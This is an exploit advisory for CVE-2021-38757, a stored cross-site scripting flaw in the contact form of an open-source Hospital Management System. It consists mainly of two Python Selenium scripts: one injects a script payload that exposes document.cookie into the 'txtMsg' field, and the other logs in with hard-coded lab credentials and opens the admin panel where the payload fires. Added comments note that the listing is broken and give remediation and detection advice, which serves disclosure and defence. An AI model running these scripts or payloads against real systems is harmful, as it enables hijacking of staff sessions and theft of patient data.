Authored by nu11secur1ty

Hospital Management System created by kishan0725 suffers from a persistent (stored) cross-site scripting vulnerability.

advisories | CVE-2021-38757

# Exploit Title: XSS-Stored PHPSESSID user PWNED on Hospital Management System - Vulnerable parameter "txtMsg" on contact form
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 08.17.2021
# Vendor: https://github.com/kishan0725/Hospital-Management-System
# Link: https://github.com/kishan0725/Hospital-Management-System
# CVE: CVE-2021-38757

[+] Exploit Source:

### P0C

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38757
#
# Stored-XSS proof of concept for the contact form of Hospital Management
# System: drives a Chrome session with Selenium, fills the contact form's
# fields through execute_script(), submits the form, then hands off to the
# companion check script listed below under "Ch3ck".
# NOTE(review): the indentation inside the try-block and the quote escaping in
# the execute_script() string literals were lost in transcription; the listing
# is reproduced here exactly as published and does not parse as-is.

from selenium import webdriver
import time  # not referenced anywhere in this script
import os

# Enter the link to the website you want to automate login for.
# The URL is a private lab address from the author's setup; the string literal
# is broken across two lines in the published copy.
website_link="
http://192.168.1.3/Hospital-Management-System-master/contact.html"


browser = webdriver.Chrome()
browser.get((website_link))

try:
## The Exploit
# Populate the contact form by element name. txtName, txtEmail and txtPhone
# are filler; only txtMsg carries the test payload.
browser.execute_script("document.querySelector('[name="txtName"]').value="User"")
browser.execute_script("document.querySelector('[name="txtEmail"]').value="
taratora@abv.bg"")
browser.execute_script("document.querySelector('[name="txtPhone"]').value="1234567890"")
# Duplicate of the previous line in the published listing; redundant but harmless.
browser.execute_script("document.querySelector('[name="txtPhone"]').value="1234567890"")
# txtMsg is the vulnerable parameter named in the advisory: the message is
# persisted by the application and, per the advisory, later rendered to a
# logged-in viewer without output encoding (the check script opens
# admin-panel1.php to observe it). The remediation belongs in the page that
# displays stored messages -- contextual HTML encoding of the value (e.g.
# htmlspecialchars in PHP) -- with a Content-Security-Policy and the HttpOnly
# flag on PHPSESSID as defence in depth against cookie exposure.
browser.execute_script("document.querySelector('[name="txtMsg"]').value="nu11secur1ty<script>alert(document.cookie)</script>"")

## submit the exploit
browser.execute_script("document.querySelector('[name="btnSubmit"]').click()")

# Check
# Shells out to the companion script, which logs in and opens the admin panel
# where the stored message is expected to be shown. Assumes the script sits in
# the current working directory.
os.system("python PoC-CVE-2021-38757-Check.py")

# The trailing "...n" is a mangled "\n" in the published listing.
print("The payload for CVE CVE-2021-38757 is deployed...n")

except Exception:
#### This exception occurs if the elements are not found in the webpage.
# Every failure (element lookup, script execution, navigation) is collapsed
# into one generic message, so the script gives no hint of which step failed.
print("Some error occured :(")

### Ch3ck

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-2021-38757
#
# Companion "check" script for the stored-XSS PoC above: signs in to the
# application with a lab test account, waits for the redirect, and then opens
# admin-panel1.php -- the page on which the message submitted through the
# contact form is expected to be rendered and the stored payload to fire.
# NOTE(review): the indentation inside the try-block was lost in transcription;
# the listing is reproduced here exactly as published.

from selenium import webdriver
import time


# Enter the link to the website you want to automate login for.
# Private lab address from the author's setup; the string literal is broken
# across two lines in the published copy.
website_link="
http://192.168.1.3/Hospital-Management-System-master/index1.php"

# Enter your login username.
# Hard-coded credentials for the author's lab instance.
username="tarator@abv.bg"

# Enter your login password.
password="password"

# Enter the element name for the username input field.
element_for_username="email"
# Enter the element name for the password input field.
element_for_password="password2"
# Enter the element name for the submit button.
element_for_submit="patsub"

browser = webdriver.Chrome()
browser.get((website_link))

try:
# Locate the login form fields by name, type the credentials and submit.
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Check
# Fixed three-second wait for the post-login redirect, then load the admin
# panel. If the stored contact message is echoed there without output
# encoding -- the defect the advisory reports -- the injected script runs
# in the viewer's authenticated session. Detection on the defender's side
# is straightforward: contact-form submissions (and the stored rows) that
# contain "<script" or other markup where free text is expected.
time.sleep(3)
browser.maximize_window()
browser.get(("
http://192.168.1.3/Hospital-Management-System-master/admin-panel1.php#"))

# The trailing "...n" is a mangled "\n" in the published listing.
print("The payload for CVE CVE-2021-38757 is deployed...n")

except Exception:
#### This exception occurs if the elements are not found in the webpage.
# Any failure (element not found, navigation error) is reported with the
# same generic message, so the step that failed is not identifiable.
print("Some error occured :(")


----------------------------------------------------------------------------------------

# Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38757
# Proof: https://streamable.com/6xue3b
# BR nu11secur1ty